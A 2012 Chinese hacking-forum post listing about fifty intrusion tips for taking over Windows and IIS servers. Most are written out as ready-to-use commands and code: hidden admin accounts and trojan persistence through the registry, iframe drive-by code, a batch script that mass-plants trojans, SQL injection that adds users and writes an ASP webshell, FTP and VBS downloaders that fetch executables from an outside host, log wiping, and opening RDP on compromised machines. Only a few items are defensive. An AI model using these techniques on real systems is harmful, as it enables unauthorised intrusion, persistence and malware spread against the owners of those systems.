中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 Z4 V) j* l( {
cacls C:\windows\system32 /G hqw20:R
g( q3 ~9 ?# M# G
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
7 D0 W* ]+ N' M# K
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; A+ V. P- j& \" o! c# W
% @) O7 O, d5 m( r5 v
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! f5 p6 d% [* r9 d- Y* j
( J2 s$ _- {* m0 [) G1 T$ B
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
0 {- t1 Q* R0 U- A: H
' b. t' N4 U1 E& ~" H/ [
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
: i/ f6 }1 S5 e
6 @2 c0 c# Y M. R
5、利用INF文件来修改注册表
6 o8 E* H/ e% v* J4 I. ~
[Version]
* W7 B7 \( z( K3 d9 L, H$ x( p
Signature="$CHICAGO$"
O1 i& ^1 `9 K1 A0 k' }6 n" V
[Defaultinstall]
5 L6 n8 U: X/ O+ A7 n' G6 P
addREG=Ating
( l' Q8 ~9 A9 N- B+ N: K
[Ating]
' X8 Z( {$ B, R# b7 R5 ^
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
1 x* W: p2 d' J" h8 ? s2 k
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
$ L5 Y- H) c+ h
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
) E& L, O7 |) W4 K! Z/ k" i* X
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 x; I5 ^5 `! G! r! ^5 q# D
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& j4 j. Z6 f/ d8 |
HKEY_CURRENT_CONFIG 简写为 HKCC
' X5 o8 V& p- i, I" t$ r- U
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
( i" n) B5 i7 Y) |) N; J
"1"这里代表是写入或删除注册表键值中的具体数据
+ s* [: H+ M1 V- ]7 N
. S% R% W+ I/ G1 {) F
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
; w3 u5 K8 [8 o9 t z2 S7 `/ U
多了一步就是在防火墙里添加个端口,然后导出其键值
; `6 B7 w6 |' N) ~9 k) b
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
$ j5 }6 Z" W6 R( T$ a r
$ Q' W% j$ d" H4 ~
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
5 Y8 z P- h4 x) C& @6 `3 h' B
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
]* Z; J4 w) Q' f
4 u4 N4 d' a7 N& q8 K
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
2 g5 ~9 r' G1 @! v4 f
0 n7 U# H" {1 {& V
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, g0 U O* k' y: Y; l) O: U
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
! t! @, q# q$ u% e5 B, }5 {
* g1 \& o7 [$ Z: \5 C8 B
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
& C9 I7 ?" m0 j: r6 Z+ _# T
$ E% W& m8 E, i, f
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 P3 `, Y+ T4 ^; ~# B2 [% V$ W( ]! _
用法:xsniff –pass –hide –log pass.txt
& V/ [8 [! ?- |; b: P- o# N
8 _) p7 }( s4 ?% v
12、google搜索的艺术
x3 C9 e7 \2 _" e( {0 I" b O
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* w7 ~8 V/ y, z
或“字符串的语法错误”可以找到很多sql注入漏洞。
! o; K/ o$ s9 |! C
; r) C) Y* Q# Y
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( W& y: N6 L2 H, H4 Y0 ^* j
2 W1 P2 N2 L4 V2 r8 p& J
14、cmd中输入 nc –vv –l –p 1987
' f% k4 n2 C/ V% Q D5 b
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- Y# ?/ z: y! }' c. W
& r5 h$ e: [- }8 M
15、制作T++木马,先写个ating.hta文件,内容为
3 l- b8 y$ Z2 u$ Y$ h$ Y" Q
<script language="VBScript">
* d* p1 m/ ^8 m% i. h' }" o
set wshshell=createobject ("wscript.shell" )
1 P9 R. k8 v% Y Z2 ^0 M& \
a=wshshell.run("你马的名称",1)
* G0 \% J8 Y) b& D( G
window.close
) D; x/ t' G, l: W/ G2 t2 L
</script>
, [2 Z$ b8 r% F7 L8 b. }
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 x: i, a u s
4 P& |4 w7 [8 c
16、搜索栏里输入
1 d/ A$ g ]! [5 h* p. h$ G$ ?+ i
关键字%'and 1=1 and '%'='
" w4 a7 `6 Q0 t
关键字%'and 1=2 and '%'='
1 T D- I! K7 o! L5 E7 `
比较不同处 可以作为注入的特征字符
# P, j% V( {& V) K2 v
2 ^7 I7 x7 ?6 e' I5 ~' m/ f
17、挂马代码<html>
( E* W. H# d/ x1 M$ b
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; p+ h3 C. r( J3 j8 R# G; B& D1 P
</html>
* o& j! Z; \, |5 k( B
- v, c: g, }4 \! x' L
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
' I6 P: J5 S! ~. L5 ?$ a% t
net localgroup administrators还是可以看出Guest是管理员来。
% D5 p! V3 Q1 Y( g/ s1 J
1 n* ^9 t# X/ ^) s7 V/ L- @) L
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* g6 R2 D1 h6 C" c- f- G
用法: 安装: instsrv.exe 服务名称 路径
' _2 k+ z9 a" i
卸载: instsrv.exe 服务名称 REMOVE
% C# q4 f4 M& h o4 C
) b* p$ ? M3 G( }. b) T; t) ]) [
. W( T) I3 L3 k; B+ x
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
; c% U# m) u. K8 ~+ N
不能注入时要第一时间想到%5c暴库。
/ Q5 q" E6 O b; R7 s
) {( g' T( X8 F! v& `7 c
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 h! U- x+ j, ^# R7 A
& M: Y5 |/ O7 A3 ~+ w% p' [
23、缺少xp_cmdshell时
/ s6 L5 z$ A; v7 [1 H* S ]* g3 h
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- F- Z/ [, l$ }$ F2 O
假如恢复不成功,可以尝试直接加用户(针对开3389的)
+ I; j6 R5 K% h) W8 V
declare @o int
; g; `/ p: Y# q
exec sp_oacreate 'wscript.shell',@o out
0 t H# |, \( }4 F% Z" {) V* r1 Y
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
, T2 d& b; ]7 }: s
& k& j# k1 e/ B6 @+ E! \. z
24.批量种植木马.bat
+ F! N' W, a8 K2 g
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 A/ a1 _( v$ s8 |1 y; k& u
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% J* Z m3 b& a3 ?3 J7 c& F- I
扫描地址.txt里每个主机名一行 用\\开头
8 l( ]0 \( X. |, d6 G8 I1 e' z
% y$ C, m4 H' I' @$ ]2 ]
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) Q7 x- `/ k# j
" ^1 F) ^( ^4 C/ K$ l2 [! M6 D
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
# Z5 c4 v, q4 p# w5 d0 n8 i a
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
6 J: L) X$ x+ V2 m+ Q5 ]8 W) |
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
1 n! n' T& E. ], k
t D8 ^$ k2 G/ X
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" b: {+ t' p$ i2 b1 J
然后用#clear logg和#clear line vty *删除日志
2 n, V$ q3 w' l8 v& c& e* L# C- {, b
* Y0 X8 n8 `" [$ E9 K
28、电脑坏了省去重新安装系统的方法
. H3 L8 R' H( J. `0 Z
纯dos下执行,
: z% d X) ~7 R% L; Y+ D
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, W1 K7 x7 `! t' A% z) D
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
0 \" S6 |6 }5 T, P) v2 U- V
) d) ?1 S9 A" n" C" R4 a
29、解决TCP/IP筛选 在注册表里有三处,分别是:
/ u2 U& Q, h8 w5 K& C$ A5 K
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. t- o0 V9 X0 c+ g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- {4 z8 @+ U E1 a$ }) K0 ?0 l3 @
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 h1 l4 ~6 i; G
分别用
G* N- V R# v+ M' T7 j4 |+ ^- J- V
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 D+ D) P; _1 o2 V4 T! |% M5 c
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" r5 f7 q: G. i/ ^: z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' W* r3 F [/ C* j- M
命令来导出注册表项
( [' }- v1 p: r: h* u( P" u7 m+ p
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
7 t6 q- t' a8 ?% z* u
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 u" ^9 k6 }# e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 t- M: i: B+ P& J6 b" V3 m
/ T! P! U1 i6 W' s2 F9 k7 d
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* Q1 [" Q1 j1 R; a
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
N. ]7 E3 f% w5 P: |
8 O0 A2 ^/ p) d+ P
31、全手工打造开3389工具
$ u& b& Z! P+ t" y! v) L
打开记事本,编辑内容如下:
0 f+ T# r) y3 w3 g$ c
echo [Components] > c:\sql
$ q3 T( N, D: O7 \+ n3 f; g
echo TSEnable = on >> c:\sql
u0 P7 h" M( B9 P; j$ `; a
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% D) {/ A/ j. Y4 v( T$ Y6 p) s
编辑好后存为BAT文件,上传至肉鸡,执行
, s3 r" v8 E8 s8 c3 R3 X1 K9 N
( k* N1 m+ S( Y/ z+ ^
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
4 |: T9 Y" Y6 Z. ~5 a. a) v0 k
2 p7 i& A/ |* \: U4 Z4 N/ r
33、让服务器重启
( E2 [4 K# L" u3 C7 X
写个bat死循环:
1 S, P1 V+ K2 Q V
@echo off
8 q3 h4 M- w7 e# v3 g0 [8 K2 v% H
:loop1
: C; y: b, G% T3 x" D3 B, }
cls
3 a$ U1 f# G& B5 `/ N% `
start cmd.exe
! u. U& O4 f \4 Q
goto loop1
* s# z4 L* ^4 n* z! k1 T! ?4 U
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ h# z- f1 R7 m5 _; k) q
3 W' j3 S5 c- f! |) [, s$ m
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
2 H/ p& ^1 I& }, o$ K; R3 d! r
@echo off
7 j& h. b& ~' Y, J) L* g
date /t >c:/3389.txt
2 s6 s9 |/ g' G% [% e) }9 F. `
time /t >>c:/3389.txt
7 |9 J! n4 C1 U4 {; w8 W! `% L5 X
attrib +s +h c:/3389.bat
+ `; ^( h8 ]6 r& O6 {$ {. i! N
attrib +s +h c:/3389.txt
- c+ V- j/ k, G
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
6 n% }& [0 [; L' J# q+ P# h2 [
并保存为3389.bat
: o4 m+ B, Z; @4 O/ @% i6 `4 P
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
; n( ^1 `" ~3 X/ G3 J$ V5 ]8 y
9 ~; n5 z4 _4 V
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 T0 n) }0 y$ S! S, s* ~
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
7 F: `0 B3 A& s/ y
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
3 o( d0 N, G, C) x
/ G9 r4 I- E+ z. a h
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 e! J1 R. B7 n9 q
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
& _5 \1 Q0 O3 x) ]5 H# }
echo 你的FTP账号 >>c:\1.bat //输入账号
J! K) R8 M7 \" \3 r- n+ B
echo 你的FTP密码 >>c:\1.bat //输入密码
, ^5 v/ e6 M- [8 f& ]7 U
echo bin >>c:\1.bat //登入
" x. ?6 [: a1 S5 k0 J4 x, S
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
0 z x! r- R0 F
echo bye >>c:\1.bat //退出
0 \1 W3 ^8 @# t5 `% t0 |- q& y
然后执行ftp -s:c:\1.bat即可
. ^ z4 m. ]5 o: F
0 ^3 j- T8 G# } h2 p
37、修改注册表开3389两法
- ~$ ^+ u& k( b5 X
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
" i( D/ `* \7 k- R3 p- T
echo Windows Registry Editor Version 5.00 >>3389.reg
4 z* l6 `3 s7 _+ S' Y1 F5 S; c
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 M' r% I5 M) K, U5 A A2 C& R$ z
echo "Enabled"="0" >>3389.reg
# r9 }8 ^ A1 X9 l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
2 e5 M4 @0 C4 \: Q
NT\CurrentVersion\Winlogon] >>3389.reg
( v+ X4 v2 i, l: l2 w) g' ]1 x2 P j9 q
echo "ShutdownWithoutLogon"="0" >>3389.reg
; d$ M& }! j. p& D7 ]9 i# l$ i8 H) _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
/ l1 o/ k! c5 y& q6 l+ r
>>3389.reg
1 Q- T& U- w. A2 Q, h
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' `+ g- O, z+ c3 v$ K* O: E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
1 b$ v) C( q! L" x; f3 F
>>3389.reg
; @: M; s, k4 m
echo "TSEnabled"=dword:00000001 >>3389.reg
: }& }, w* D3 J" u+ g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
( e3 k9 Z: k/ c3 v) Q0 z H
echo "Start"=dword:00000002 >>3389.reg
% U9 c) z' }9 \2 P6 `+ _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 e+ A$ ?1 L5 ^# p3 V: R
>>3389.reg
4 i; O- `( x# u
echo "Start"=dword:00000002 >>3389.reg
J y; G; M" s, @) k# w: }7 K
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- c8 E$ }* q2 P9 D
echo "Hotkey"="1" >>3389.reg
, D% b) `1 R9 _/ ~' G4 }( o) s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& Z5 f6 D* p2 Y* X. y4 N6 A
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
/ g4 S& |0 I2 L# k" ]7 k& w
echo "PortNumber"=dword:00000D3D >>3389.reg
0 E2 s0 V9 i1 j) b6 s/ J9 C- \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, l9 g+ p. U. s7 r% ?: a
Server\WinStations\RDP-Tcp] >>3389.reg
( N$ e3 [3 v' G& V
echo "PortNumber"=dword:00000D3D >>3389.reg
9 c" L4 K3 i/ z3 M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, s2 O3 X7 O% l8 J+ M9 s
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
6 h' b8 w0 n$ y) U: \
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; A9 \# s% V+ U" F2 I7 E
(2)winxp和win2003终端开启
+ C; m2 V. l+ e( I9 T
用以下ECHO代码写一个REG文件:
\/ k( p/ X- w; B, q' I, A
echo Windows Registry Editor Version 5.00>>3389.reg
% u0 U' o5 d+ ^, q+ [" Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% \1 J6 I) N& X6 E& s) G0 N& Q
Server]>>3389.reg
% ~2 c& W. g" [% c4 U' }" C
echo "fDenyTSConnections"=dword:00000000>>3389.reg
: ]" V/ r; @7 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 l4 ^8 n6 J& C; [* j
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
& g, z5 ~7 c+ Q2 [: a$ a5 @3 |5 a2 x
echo "PortNumber"=dword:00000d3d>>3389.reg
; L8 t+ @' E! ?# w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) a. P6 v' `2 n
Server\WinStations\RDP-Tcp]>>3389.reg
9 o+ X; Q1 Y! S+ z
echo "PortNumber"=dword:00000d3d>>3389.reg
1 J, g3 d$ B2 E' s: c" \2 {5 u- Y
然后regedit /s 3389.reg del 3389.reg
: L* ]/ L; \5 k$ ~/ v; d4 j
XP下不论开终端还是改终端端口都不需重启
$ t% s% B3 T" A( ? q/ ?
* s, f1 d+ y$ a2 [6 b9 y5 X
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( l, u% f; {9 a
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
8 x4 g: m/ S+ k, G- Q
0 }$ S8 n$ y- y" Y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 p' C2 B; u) i+ P. N
(1)数据库文件名应复杂并要有特殊字符
2 I* a/ p* E" I$ r" [
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: J" [; n. s1 Q& Z% X( \8 c
将conn.asp文档中的
3 E" U4 W% U: e+ n9 d. J! R
DBPath = Server.MapPath("数据库.mdb")
# F8 B( J5 E0 A- }+ f( _
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
$ Q( M% h9 G/ f; \' I
8 U @* R7 k* ?( W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
5 x2 m8 ~ p/ {- M9 s4 q6 P
(3)不放在WEB目录里
& _. e/ N* K: ], O9 H' d! a
% e5 L% j8 W7 g9 j) t
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ a$ \( t: Q+ G# ^( U: n4 i8 I) v
可以写两个bat文件
2 @, T6 e1 S( h( L. ?
@echo off
/ r% I2 u% r% k W
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
5 @% p, R; ^* ?& R" f2 f- s! b+ f9 `/ g+ M
@del c:\winnt\system32\query.exe
# b! B- J! X$ z/ Y" `, M
@del %SYSTEMROOT%\system32\dllcache\query.exe
* [' e- Q# e% a3 s( B; f' `# R
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
1 f0 {3 N. \/ X3 x. C4 Y
/ a/ ^# P, Y, o8 ~) e3 w
@echo off
8 H# i$ H. p2 S6 H: S( P
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ ^5 l1 Z/ z I" _& N. R
@del c:\winnt\system32\tsadmin.exe
- {2 K5 ^3 Z. p. ?
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
/ k& O# x8 r- r" K
9 O6 j4 }% L3 [4 \* E
41、映射对方盘符
+ B9 \( }1 j* r8 M) P$ Z# l
telnet到他的机器上,
$ X' b5 E1 g6 [+ r0 m
net share 查看有没有默认共享 如果没有,那么就接着运行
2 X3 g* g. `6 u5 E! \: f' s/ x
net share c$=c:
3 T7 a0 R2 C) `, W4 F1 _
net share现在有c$
. l7 ~" V3 S: M3 d- l, [0 ~# ~
在自己的机器上运行
: g1 H/ k8 v _& O: U- X( ^
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
4 Y, F1 F1 u0 h
' U8 }* H$ H5 }" f
42、一些很有用的老知识
9 n# c. ?3 q/ I* q* }7 f
type c:\boot.ini ( 查看系统版本 )
+ i v6 I5 I( {, B% [# u
net start (查看已经启动的服务)
5 I! _ m4 h$ F2 N1 b6 F! P. _
query user ( 查看当前终端连接 )
/ M% L' I# J, v) ^0 E
net user ( 查看当前用户 )
8 W8 S) h& G+ G% e$ ^
net user 用户 密码/add ( 建立账号 )
5 ^( U1 r. h. ^9 P
net localgroup administrators 用户 /add (提升某用户为管理员)
) ^0 X% h& ^1 c" Y/ ^( {% n
ipconfig -all ( 查看IP什么的 )
( c: f. x" I* }& v. L
netstat -an ( 查看当前网络状态 )
# m8 H0 t) k8 Z" K
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. m$ |& E" _: m: B
克隆时Administrator对应1F4
3 A% J8 l# s1 l/ K; Y* r
guest对应1F5
4 W+ r3 Q: Y, j6 u$ b
tsinternetuser对应3E8
; J6 |4 A. e1 t
9 H' I$ x8 d8 S0 g, y' o' P8 d
43、如果对方没开3389,但是装了Remote Administrator Service
+ D0 D& }! T* N$ W. v8 a! F# i
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 S8 X3 T$ K3 P P1 } P) ]3 Q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- `- L" W+ `4 o: V) J+ v/ k
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# f$ z% ~& L R \* D. A3 ], ]4 b
) D1 p5 p# h, @) R* ^/ @8 H
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: C) Q4 O2 u4 V- @8 g
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 o h% @4 b% H6 O
- z& n1 v2 h ~6 N
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
$ C" |9 I6 X) P0 ?1 c5 G" f& n7 u
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
" `2 C; u: H7 L$ J3 e
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: w0 i% K! P' |8 w0 Z7 ]% c* n- S
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ g$ c' W0 i7 l2 t
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
' `: S: y8 X* u4 J( F3 s+ @/ V4 B
(这是完整的一句话,其中没有换行符)
' H& D2 T& i( F2 ~
然后下载:
+ T* m; I! V( p# N, `7 q
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
3 O, `, P. A* G5 i
/ \5 K Y! Y( S
46、一句话木马成功依赖于两个条件:
. n4 K0 ^3 m# w% U2 Z5 ^0 x( o! q
1、服务端没有禁止adodb.Stream或FSO组件
+ o4 l' ?* \/ z. c4 U- x
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
( A. T6 U& u. }* a
5 d9 b0 ~! A7 X; y4 k8 `
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
6 U! B g( A$ {+ s
;alter database utsz set RECOVERY FULL--
; a6 D- g5 F/ }4 `
;create table cmd (a image)--
5 K* H: ~ j& }4 J4 i6 }3 A5 w
;backup log utsz to disk = 'D:\cmd' with init--
+ T; K" r& Q, \) R3 E; Y
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
5 x/ W/ D3 F8 K/ e7 x8 d
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
, |' g6 K6 M2 u5 _
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
6 @' C$ x) s9 Z9 f. d* W- W# x
, \5 P: W" H9 u# J
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
8 f# E% k0 S" V
- ~4 t6 n" C) Z% t$ H& y9 M( t
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
& r' I# n0 l' f% R/ Q8 h
所有会话用 'all'。
9 e, T3 H) J# H0 G
-s sessionid 列出会话的信息。
7 e) r; a) M) n; `6 T' d8 R& g
-k sessionid 终止会话。
! S0 Y5 T* ?0 r5 Z" c' j
-m sessionid 发送消息到会话。
7 `8 e5 H) |% V1 L
- H3 d6 b% e+ t4 B. }1 K. u6 d
config 配置 telnet 服务器参数。
; `6 F3 @* v; ]
, i3 f8 v( P$ n( p" R0 G0 Q
common_options 为:
) B) i2 F; c) P Y
-u user 指定要使用其凭据的用户
0 E" Q- `5 D5 n; F8 ^' i9 F
-p password 用户密码
, z! C% s h9 {. n/ S
1 w$ r+ y/ k' F! }3 t) W7 t8 U) T& c+ `
config_options 为:
3 O' q9 k/ l* ^* U" I
dom = domain 设定用户的默认域
+ v' A* N3 C# D$ _) h
ctrlakeymap = yes|no 设定 ALT 键的映射
+ b# D8 M, H6 U( _4 D* x
timeout = hh:mm:ss 设定空闲会话超时值
5 \: P+ i' B% p* H7 j# S
timeoutactive = yes|no 启用空闲会话。
( H5 _" Q) s2 V9 g- ^
maxfail = attempts 设定断开前失败的登录企图数。
: W& [$ E4 g' o' _- p
maxconn = connections 设定最大连接数。
( }# d! C q2 p; w
port = number 设定 telnet 端口。
3 m# `1 R% i, w6 v$ T
sec = [+/-]NTLM [+/-]passwd
. ~2 o0 M5 t5 b* F
设定身份验证机构
( m0 @/ z5 w+ I
fname = file 指定审计文件名。
# t. ?: b4 w% Z. J* f8 C0 v- ^
fsize = size 指定审计文件的最大尺寸(MB)。
) D+ U2 }5 @$ _2 t/ q) m R
mode = console|stream 指定操作模式。
* m* c. W/ ]0 N4 W1 K& {6 I5 Y
auditlocation = eventlog|file|both
+ a# Z9 N V1 b& r" Y4 ?5 F
指定记录地点
( I- `. Y+ ^8 B& N) A
audit = [+/-]user [+/-]fail [+/-]admin
6 y7 b; a1 Y( \; i# g, \
+ R8 ^! s' z, T/ Z
49、例如:在IE上访问:
. ~! n8 G# }! G# q4 L' ~
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
3 r' `9 K- Q E1 U9 A8 N3 w, ~3 d
hack.txt里面的代码是:
) j& k* X, ^3 u6 p. F
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
. s( |6 }. c* s! G
把这个hack.txt发到你空间就可以了!
* o: D9 q8 n2 ], Q& H; o: ^( A
这个可以利用来做网马哦!
S: |$ i. d& n- I) B! b
; T3 j, ]* u* }9 C. G! O/ d
50、autorun的病毒可以通过手动限制!
9 V4 Z2 u; B; _0 E) I
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
y) e+ h" U8 N- h; r0 `9 a3 J
2,打开盘符用右键打开!切忌双击盘符~
